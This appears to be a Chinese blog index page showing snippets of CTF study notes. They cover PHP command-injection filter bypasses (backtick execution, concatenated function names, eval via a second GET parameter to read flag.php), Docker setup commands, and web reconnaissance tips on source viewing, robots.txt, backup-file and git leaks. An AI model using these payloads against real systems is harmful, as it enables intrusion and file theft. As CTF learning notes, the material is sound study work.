命令执行 flag被过滤:system('tac fla*'); system被过滤:echo `tac fla*` 拼接法:?c=$a=sys;$b=tem;$c=$a.$b;$c("tac fla*"); 再传参:?c=eval($_GET[1]);&1=system("tac flag.php"); 利 2025-06-08 8 0 ctf 命令执行
随记 docker部署 sudo apt update apt install docker apt install docker-compose cd sudo docker-compose up - d INF:表示“无穷大”,通常在除以零的操作中出现,例如1.0/0.0 NaN:表示“不是一个数字” 2025-06-03 20 0 ctf 命令执行 杂项
信息收集tips F12,注释里面找 打不开F12,选中 url 按F12,url 前加view-source:,ctrl+u 没思路抓包看看 不会藏在robots.txt里面吧 备份文件泄露:index.phps;Linux的备份文件:index.php.swp;www.zip;fzbk 扫描 git泄露,访问.g 2025-05-26 7 0 ctf 信息收集
